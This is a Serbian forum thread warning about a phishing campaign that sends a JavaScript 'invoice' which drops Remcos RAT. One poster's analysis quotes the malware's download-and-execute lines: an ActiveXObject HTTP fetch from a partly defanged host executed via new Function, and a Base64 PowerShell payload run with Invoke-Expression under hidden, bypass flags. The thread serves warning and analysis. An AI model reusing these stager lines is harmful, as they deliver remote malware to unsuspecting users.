gmail od preduzetnika šalje spam koji sadrži skriveni malware

[milos_rs]

Ovo je dosta kružilo i izgleda stiglo svima u inbox jer je vešto maskirano pa ni gmail anti-spam nije provalio.

   

Izgleda da je poslato sa pravog naloga jednog preduzetnika iz Bačke Palanke :

   

Nalog moguće kompromitovan.

attachment je js fajl:  https://www.virustotal.com/gui/file/a351...6f2041f0f9

   

Takođe je neko napravio YouTube snimak koji upozorava na opasnost: OPREZ! Novi malware napad na preduzetnike, knjigovodje i vlasnike firmi u Srbiji

[VincaSec]

Malver u ovom slučaju koristi GeoIP servis, kako bi odredio geografsku lokaciju žrtve, što mu omogućava da prilagodi ponašanje u zavisnosti od regiona, izbegne pravne posledice i zaobiđe bezbednosne mere. Na osnovu lokacije može lažno da se predstavi kao lokalni entitet, koristi lokalni jezik i cilja specifične sisteme, čime povećava efikasnost napada i otežava detekciju.

Uz to, napadači koriste tehniku “cloaking”, pri čemu smeštaju spam sadržaj u .txt fajlove u poddirektorijume pored legitimnih .js fajlova. Kada pretraživački botovi zatraže URL, skripta učitava sadržaj .txt fajla i ubacuje ga u HTML stranice, omogućavajući prikaz različitog sadržaja botovima i stvarnim korisnicima.

   

Crowdsourced IDS pravila dodatno potvrđuju zlonamernu aktivnost, identifikovani su Remcos RAT TLS konekcije, C2 komunikacija, exploit kit aktivnost preko kodiranih Base64 payload-a (ReverseLoader), pokušaji egzekucije malvera sa kodiranim MZ header-ima, kao i sumnjivi DNS zahtevi ka DynDNS domenima (*.ddns.net) i korišćenje WScript.Shell (Windows komponenta koja omogućava izvršavanje komandi iz skripti, a napadači je zloupotrebljavaju za pokretanje malvera, preuzimanje fajlova i izmene sistema bez znanja korisnika.)

   

U analiziranom slučaju, zlonamerni softver je ostavio četiri fajla, uključujući jedan PowerShell modul bez detekcija i dva izvršna .exe
fajla, jedan sa 6, a drugi sa čak 63 antivirusne detekcije, što ukazuje na visok rizik od maliciozne aktivnosti. Ovi .exe fajlovi najverovatnije sadrže glavni payload malvera.

   

Takođe, u priloženoj slici možete videti kako izgleda otvaranje .txt fajlova koji se preuzimaju sa malicioznih URL-ova. Takvi fajlovi služe za prikrivanje malicioznog koda i mogu omogućiti tzv. "cloaking", injekciju sadržaja u legitimne stranice, ili čak direktno preuzimanje i pokretanje dodatnih komponenti malvera.

   
   
   

[VincaSec]

Analiza Execution Parents sekcije pokazuje da je zlonamerni .exe fajl pokrenut preko više različitih .js (JavaScript) i PowerShell fajlova, što jasno ukazuje na lančanu infekciju, tipičan metod distribucije malvera putem lažnih dokumenata i skripti maskiranih kao fakture i narudžbenice.

Većina fajlova ima imena kao što su "Factura", "Faktura", "Purchase Order" ili koriste nasumične nazive, a predstavljeni su kao legitimni dokumenti koji bi korisnici mogli otvoriti u poslovnom okruženju. Ovi JavaScript fajlovi imaju visoke stope detekcije (npr. 32/62, 29/61), što ukazuje da su prepoznati kao maliciozni. Kada korisnik otvori takav .js fajl, on najverovatnije koristi WScript.Shell da pokrene PowerShell komandu ili direktno preuzme i izvrši zlonamerni .exe fajl sa udaljenog servera.

Jedan primer u lancu je i PowerShell skripta (4df9f243...) koja je korišćena kao međukorak između .js fajla i .exe payload-a. Ovo ukazuje na više faza napada: prvo socijalni inženjering (navođenje korisnika da otvori "fakturu"), zatim skriptna egzekucija, i na kraju preuzimanje/pokretanje glavnog malvera.

   
   

[VincaSec]

Analizirao sam kod:

https://justpaste.it/i5msy

Ova skripta je maliciozna i koristi obfuscaciju kako bi prikrila zlonamernu funkcionalnost. Glavni cilj joj je da preuzme i izvrši udaljeni kod sa sumnjivog URL-a koristeći

Code:

ActiveXObject

(specifičan JavaScript interfejs za Internet Explorer koji omogućava pristup Windows COM komponentama, često korišćen za rad sa fajl sistemom, mrežom i drugim niskonivojskim operacijama.)

što radi samo u Internet Explorer-u ili Windows Script Host okruženju. Konkretno, koristi funkciju

Code:

convenes()

da dekodira obfuscated stringove uklanjanjem karaktera.

Code:

ٿ

Na primer, URL

Code:

"hٿtٿtٿp...txt"

postaje:

Code:

http: / / 9001lovestoblog(.)com/arquivo_a8431cbb1fe14b89bb915eba088e3469.txt

Zatim, koristi:

Code:

ActiveXObject

Code:

var anisian = new ActiveXObject("MSXML2.ServerXMLHTTP");
anisian.open("GET", decodedUrl, false);
anisian.send();

da bi poslao HTTP GET zahtev i preuzeo sadržaj udaljenog fajla.
Kada se sadržaj fajla preuzme, on se izvršava kao JavaScript kod, što se postiže korišćenjem:

Code:

new this["Function"](responseText)();

Ovo efektivno omogućava daljinsko izvršavanje proizvoljnog koda, što napadaču daje punu kontrolu nad ciljnim sistemom. Ostatak skripte imitira Microsoftove printer skripte koristeći tehničke XML funkcije kao što su:

Code:

SetStandardNameSpaces()

Code:

createProperty()

što služi za maskiranje namere malvera i zbunjivanje analitičkih alata. Ključna linija u napadu je izvršavanje koda iz preuzetog sadržaja, čime se potencijalno instalira dodatni malver, keylogger ili backdoor.

Korisni linkovi ka člancima:

https://blog.sucuri.net/2023/10/shifting...developers

https://cybersecuritynews.com/malware-vi...%20quickly.

https://veriti.ai/blog/veriti-research/u...-tracking/

I da dodam na kraju da skida malver Remcos.

Ovde sam pokrenuo skriptu i može da se vidi ponašanje same skripte:
https://app.any.run/tasks/07ba6876-7eb4-...760089e5fc

[VincaSec]

Takođe sam analizirao i kod u .txt fajlu sa kojim komunicira glavni .js fajl.

Kod:
https://justpaste.it/hjefo

Ovaj JScript fajl predstavlja primer malicioznog koda koji koristi tehniku obfuskacije kako bi sakrio i pokrenuo PowerShell komandu. Na početku, fajl generiše veoma dugačak Base64 string koji zapravo sadrži PowerShell skriptu. Međutim, da bi se otežala analiza, unutar tog stringa su namerno ubačeni specijalni karakteri (ٿ) koji zamagljuju pravi sadržaj. U nastavku izvršavanja, skripta uklanja sve te umetnute karaktere, dekodira prečišćeni Base64 string i tako dobija validan PowerShell kod.

PowerShell kod koristi promenljivu $borschts u kojoj je smešten dugačak Base64 enkodiran string. Taj string sadrži obfuskiranu PowerShell skriptu zapakovanu u Unicode formatu. Da bi se skripta mogla izvršiti, prvo se vrši dekodiranje Base64 niza u bajt niz, a zatim se taj niz konvertuje u Unicode string pomoću [System.Text.Encoding]::Unicode.GetString(). Rezultat je originalna PowerShell skripta, sada u čitljivom obliku, ali i dalje skrivena unutar promenljive $hemifacial.

Code:

$hemifacial=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($borschts));

Nakon što se originalna skripta rekonstruiše, ona se izvršava pomoću Invoke-Expression, što omogućava dinamičko pokretanje koda koji je prethodno bio enkodiran i sakriven. Ova tehnika omogućava malicioznom autoru da sakrije pravu prirodu skripte u nečitljivom obliku i time oteža analizu i detekciju malvera od strane antivirusnih alata.

Code:

Invoke-Expression $hemifacial

Code:

powershell -windowstyle hidden -noprofile -executionpolicy bypass -c

Osigurava se da skripta izvršava u potpunoj tišini (bez vidljivog prozora), bez uticaja korisničkih profila, i bez ograničenja koja bi sprečila izvršenje koda, čime se povećava šansa da maliciozni payload uspešno prođe neprimećeno.

   

[VincaSec]

Nisam imao pristup celom headeru emaila, ali je jedan korisnik sa Reddita podelio zanimljive delove headera gde se vidi da priloženi fajl zapravo nije PDF, već slika navodne fakture, i da link vodi ka .js fajlu.

   
   

[VincaSec]

https://vincasec.github.io/posts/Malver-...mailovima/

Detaljna analiza phishing emaila